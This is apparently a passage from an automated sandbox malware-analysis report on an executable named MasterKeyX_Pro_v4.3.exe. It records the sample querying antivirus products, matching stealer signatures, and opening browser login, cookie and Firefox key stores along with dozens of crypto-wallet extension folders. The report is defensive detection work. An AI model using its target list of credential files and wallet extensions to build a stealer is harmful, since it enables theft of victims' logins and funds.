Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 6.2.AddInProcess32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.AddInProcess32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2627741539.000000000472E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2612742813.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2627741539.00000000046FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MasterKeyX_Pro_v4.3.exe PID: 7296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 8096, type: MEMORYSTR
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 6jaXXZf
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: AddInProcess32.exe, 00000007.00000002.2909478059.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus Web3 Wallet
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: chrome.exe, 0000000A.00000002.2801641614.000040CC004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: GCMKeyStore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db Jump to behavior
